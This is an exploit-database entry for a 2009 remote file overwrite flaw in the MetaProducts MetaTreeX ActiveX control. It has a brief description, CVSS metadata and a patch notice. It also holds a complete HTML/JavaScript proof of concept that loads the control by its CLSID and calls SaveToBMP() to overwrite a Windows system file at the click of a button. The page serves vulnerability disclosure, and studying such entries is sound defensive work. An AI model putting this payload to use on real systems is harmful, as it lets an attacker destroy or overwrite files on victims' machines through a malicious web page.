header-logo
Suggest Exploit
vendor:
MetaTreeX
by:
Houssamix
9.3
CVSS
HIGH
Remote File Overwrite
264
CWE
Product Name: MetaTreeX
Affected Version From: 1.5.0100
Affected Version To: 1.5.0100
Patch Exists: Yes
Related CWE: N/A
CPE: a:metaproducts:metatreex
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit

This exploit allows an attacker to overwrite a file on the target system. The vulnerability exists in the SaveToBMP() function of the MetaTreeX ActiveX control, which is identified by the CLSID {67E66985-F81A-11D6-BC0F-F7B40157DC26}. The SaveToBMP() function allows an attacker to specify a file path, which can be used to overwrite an existing file on the target system.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit    <br/>

	Note : SaveToFile() is vuln to  <br/>

<b/>


<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>

<SCRIPT>
/*

Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  

*/
function hehe()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.SaveToBMP(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-16]